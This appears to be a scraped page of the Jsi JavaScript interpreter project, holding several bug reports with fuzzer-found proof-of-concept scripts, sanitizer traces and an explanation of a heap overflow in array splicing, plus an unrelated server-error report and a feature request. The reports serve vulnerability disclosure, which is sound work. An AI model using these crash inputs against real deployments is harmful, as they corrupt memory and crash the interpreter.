Jsi is a small, C-embeddable javascript interpreter with tightly woven Web and DB support.
Home Page: https://jsish.org/
License: MIT License
Jsi is a javascript-ish interpreter with builtin websocket-server, sqlite and C-extensibility.
Get source and build '''make'''.
Or download a binary: https://github.com/pcmacdon/jsibin/
🚩 See Start.
./jsish -W -docs / # Jsi web-docs.
./jsish -S mysqlite.db # Sqlite web-gui.
Compile and run a simple C-extension.
./jsish -c -jsc "function add(n1:number, n2:number=1):number { n1+=n2; \nRETURN(n1);\n }" Sum
./jsish -e 'require("Sum",0); return Sum.add(9,3);'
Commit: 9fa798e
Version: v3.5.0
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
export CFLAGS='-fsanitize=address'
make(function(){
var JSEtest = 1;
for (var __loopvar3 = 0; JSEtest.length < (1) && __loopvar3 < 3; JSEtest.length++ + __loopvar3++) {
JSEtest = 1;
}
})();$ ./jsish/jsish poc.js
jsish: src/jsiEval.c:1020: jsiEvalSubscript: Assertion `vp != resPtr' failed.
[2] 11225 abort jsish poc.jsCredits: Found by hopefly from OWL337.
Ubuntu 16.04
gcc 5.4.0
version: a6fc196
build command:
export JSI__SANITIZE=1
make
test command: ./jsish poc
Desktop Linux
Below is the ASAN outputs.
==41969==ERROR: AddressSanitizer: stack-overflow on address 0x7fff2f2c8ff8 (pc 0x7f46bdb37cc0 bp 0x7fff2fabd910 sp 0x7fff2f2c8ff0 T0)
#0 0x7f46bdb37cbf (/lib/x86_64-linux-gnu/libc.so.6+0xdfcbf)
#1 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#2 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#3 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#4 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#5 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#6 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#7 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#8 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#9 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#10 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#11 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#12 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#13 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#14 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#15 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#16 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#17 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#18 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#19 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#20 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#21 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#22 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#23 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#24 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#25 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#26 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#27 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#28 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#29 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#30 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#31 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#32 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#33 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#34 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#35 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#36 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#37 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#38 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#39 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#40 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#41 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#42 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#43 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#44 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#45 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#46 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#47 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#48 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#49 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#50 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#51 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#52 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#53 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#54 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#55 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#56 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#57 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#58 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#59 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#60 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#61 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#62 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#63 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#64 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#65 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#66 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#67 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#68 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#69 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#70 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#71 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#72 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#73 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#74 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#75 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#76 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#77 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#78 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#79 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#80 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#81 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#82 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#83 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#84 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#85 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#86 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#87 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#88 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#89 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#90 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#91 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#92 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#93 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#94 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#95 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#96 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#97 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#98 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#99 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#100 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#101 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#102 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#103 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#104 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#105 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#106 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#107 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#108 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#109 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#110 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#111 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#112 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#113 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#114 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#115 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#116 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#117 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#118 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#119 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#120 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#121 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#122 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#123 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#124 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#125 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#126 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#127 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#128 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#129 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#130 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#131 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#132 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#133 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#134 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#135 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#136 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#137 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#138 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#139 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#140 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#141 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#142 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#143 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#144 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#145 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#146 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#147 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#148 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#149 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#150 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#151 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#152 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#153 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#154 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#155 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#156 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#157 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#158 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#159 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#160 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#161 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#162 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#163 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#164 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#165 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#166 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#167 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#168 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#169 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#170 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#171 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#172 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#173 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#174 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#175 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#176 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#177 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#178 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#179 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#180 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#181 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#182 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#183 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#184 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#185 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#186 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#187 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#188 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#189 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#190 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#191 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#192 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#193 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#194 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#195 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#196 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#197 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#198 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#199 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#200 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#201 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#202 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#203 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#204 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#205 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#206 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#207 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#208 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#209 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#210 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#211 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#212 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#213 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#214 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#215 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#216 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#217 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#218 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#219 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#220 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#221 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#222 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#223 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#224 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#225 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#226 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#227 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#228 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#229 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#230 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#231 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#232 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#233 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#234 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#235 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#236 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#237 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#238 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#239 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#240 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#241 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#242 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#243 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#244 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#245 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#246 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#247 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#248 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
#249 0x7f46bdb37ccd (/lib/x86_64-linux-gnu/libc.so.6+0xdfccd)
#250 0x7f46bdb39e85 (/lib/x86_64-linux-gnu/libc.so.6+0xe1e85)
#251 0x7f46bdb3c16b (/lib/x86_64-linux-gnu/libc.so.6+0xe416b)
SUMMARY: AddressSanitizer: stack-overflow ??:0 ??
==41969==ABORTING
operating system: ubuntu18.04
compile command: ./configure && make
test command: ./jsish poc1
var o = [
1,
2
];
var JAZh = -2147483647 == -9007199254740991;
o = o.splice(o.length, o.length, o, o, o.length, 1.7976931348623157e+308);
o.length = o.length != o;
var itMb = 10000 <= -2147483648;
o = o.constructor();
var QHiF = o.length < o.length;
var a = Object.keys(o);
o.length = ~-9007199254740992;
var APSB = -9007199254740990 != a.length;
o = o.splice(o.length, a.length, 9007199254740994, o, APSB, 759250124);
The code that caused the vulnerability is in line src / jsiObj.c + 417, the function jsi_ObjArraySizer, the code is as follows:
The parameter len is the length of the Array. The PoC is initially set to a maximum value by o.length:
Then call Jsi_ObjArraySizer in jsi_ArraySpliceCmd. After the code calculation, nsiz is calculated as a negative number, which can bypass the two checks of line 421 and line 425,
The affected code is as follows:
obj-> arr will obtain a smaller heap space through Jsi_Realloc, and then memset assigns a value to the space pointed to by obj-> arr + obj-> arrMaxSize, but this time has exceeded the actual heap range of obj-> arr, causing Heap overflow.
Commit: 9fa798e
Version: v3.5.0
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
export CFLAGS='-fsanitize=address'
makefunction applyTags(text, open, close, action) {
var openTags = arguments;
var lastOcr = text.indexOf(open), nextOpen, nextClose, iniBlock, updBlock;
if (openTags.pop()) {
openTags.push(lastOcr);
}
while (openTags.length > 0) {
lastOcr = action;
nextOpen = text.indexOf(open, lastOcr + open.length);
nextClose = text.indexOf(close, lastOcr + open.length);
}
return text;
}
function JSEtest(text) {
return text.toUpperCase();
}
var text = '<lowcase> YEAH! </lowcase> Some <upcase> random <upcase> text </upcase> to </up$
text = applyTags(text, '<upcase>', '</upcase>', JSEtest);$ ./jsish/jsish poc.js
/home/user/poc.js:9: bug: Convert a unknown type: 0x6 to number (at or near "length")
/home/user/poc.js:10: bug: Convert a unknown type: 0x6 to number (at or near "length")
jsish: src/jsiValue.c:181: ValueFree: Assertion `v->d.lval != v' failed.
[2] 116137 abort jsish poc.jsCredits: Found by OWL337 team.
split from #41: the online demos (https://docs.jsish.org/Demos.md#online) yield 502 Bad Gateway error for me, while they work fine for someone else.
The first demo link for me resolves to https://jsish.org/App10/Ledger, is that the same target for you @pcmacdon ?
I get 502 err with both FF and Chrome. I wonder if it has something to do with permissions or login status?
Here's the Network Headers according to Chrome dev tools:
Request URL: https://jsish.org/App10/Ledger
Request Method: GET
Status Code: 502 Bad Gateway
Remote Address: 50.116.0.90:443
Referrer Policy: no-referrer
Connection: keep-alive
Content-Length: 575
Content-Type: text/html
Date: Mon, 13 Sep 2021 19:18:06 GMT
Server: nginx/1.14.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cache-Control: max-age=0
Connection: keep-alive
DNT: 1
Host: jsish.org
sec-ch-ua: "Google Chrome";v="93", " Not;A Brand";v="99", "Chromium";v="93"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-site
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Saf
hi,
I use postgres for my database needs.
It would like to be able to use the virtualpg+sqlite3 and native postgresql for database backends and query writing
Ubuntu 16.04
gcc 5.4.0
version: 73f457f
build command:
export JSI__SANITIZE=1
make
test command: ./jsish poc
==42992==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60b00000a4f2 at pc 0x7fe14fca0935 bp 0x7ffe63bb9fa0 sp 0x7ffe63bb9748
READ of size 96 at 0x60b00000a4f2 thread T0
#0 0x7fe14fca0934 in __asan_memcpy (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x8c934)
#1 0x5c12d1 in memcpy /usr/include/x86_64-linux-gnu/bits/string3.h:53
#2 0x5c12d1 in Jsi_DSAppendLen src/jsiDString.c:109
#3 0x5ebb2e in Jsi_UtfSubstr src/jsiUtf8.c:130
#4 0x4e74f9 in _StringTrimCmd src/jsiString.c:370
#5 0x4e74f9 in StringTrimCmd src/jsiString.c:378
#6 0x4c405d in jsi_FuncCallSub src/jsiProto.c:244
#7 0x73eaa4 in jsiFunctionSubCall src/jsiEval.c:790
#8 0x73eaa4 in jsiEvalFunction src/jsiEval.c:825
#9 0x73eaa4 in jsiEvalCodeSub src/jsiEval.c:1250
#10 0x7506ec in jsi_evalcode src/jsiEval.c:2190
#11 0x4c517a in jsi_FuncCallSub src/jsiProto.c:220
#12 0x73e7ca in jsiFunctionSubCall src/jsiEval.c:790
#13 0x73e7ca in jsiEvalFunction src/jsiEval.c:825
#14 0x73e7ca in jsiEvalCodeSub src/jsiEval.c:1250
